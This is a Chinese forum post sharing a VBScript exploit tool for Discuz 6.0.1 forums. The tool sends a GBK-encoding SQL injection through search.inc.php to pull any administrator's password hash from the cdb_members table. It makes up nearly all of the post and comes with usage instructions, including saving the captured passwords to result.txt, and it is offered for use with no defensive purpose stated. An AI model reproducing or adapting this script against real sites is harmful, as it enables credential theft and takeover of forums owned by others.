画卿颜 發表於 2009-4-18 13:51:46

discuz获取任意管理员密码漏洞利用工具vbs版

以下是search.inc.php 文件漏洞利用代码VBS版 <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode9"> <br />Dim strUrl,strSite,strPath,strUid <br />showB() <br />Set Args = Wscript.Arguments <br />If Args.Count &lt;&gt; 3 Then <br />ShowU() <br />Else <br />strSite=Args(0) <br />strPath=Args(1) <br />strUid=Args(2) <br />End If <br />strUrl="action=search&amp;searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" &amp; strUid &amp;"/*&amp;do=submit" <br />Set objXML = CreateObject("Microsoft.XMLHTTP") <br />objXML.Open "POST",strSite &amp; strPath &amp; "index.php", False <br />objXML.SetRequestHeader "Accept", "*/*" <br />objXML.SetRequestHeader "Accept-Language", "zh-cn" <br />objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" <br />objXML.SetRequestHeader "User-Agent", "wap" <br />objXML.send(strUrl) <br />wscript.echo(objXML.ResponseText) <br />Sub showB() <br />With Wscript <br />.Echo("+--------------------------=====================------------------------------+") <br />.Echo("Exploit discuz6.0.1") <br />.Echo("Code By Safe3") <br />.Echo("+--------------------------=====================------------------------------+") <br />End with <br />End Sub <br />Sub showU() <br />With Wscript <br />.Echo("+--------------------------=====================------------------------------+") <br />.Echo("用法:") <br />.Echo(" cscript "&amp;.ScriptName&amp;" site path uid") <br />.Echo("例子:") <br />.Echo(" cscript "&amp;.ScriptName&amp;" http://www.example.com/ /forum/ 1 &gt;result.txt") <br />.Echo("+--------------------------=====================------------------------------+") <br />.Quit <br />End with <br />End Sub <br /></div>  <br />获得的密码大家自己在result.txt中查找 <br />
頁: [1]
查看完整版本: discuz获取任意管理员密码漏洞利用工具vbs版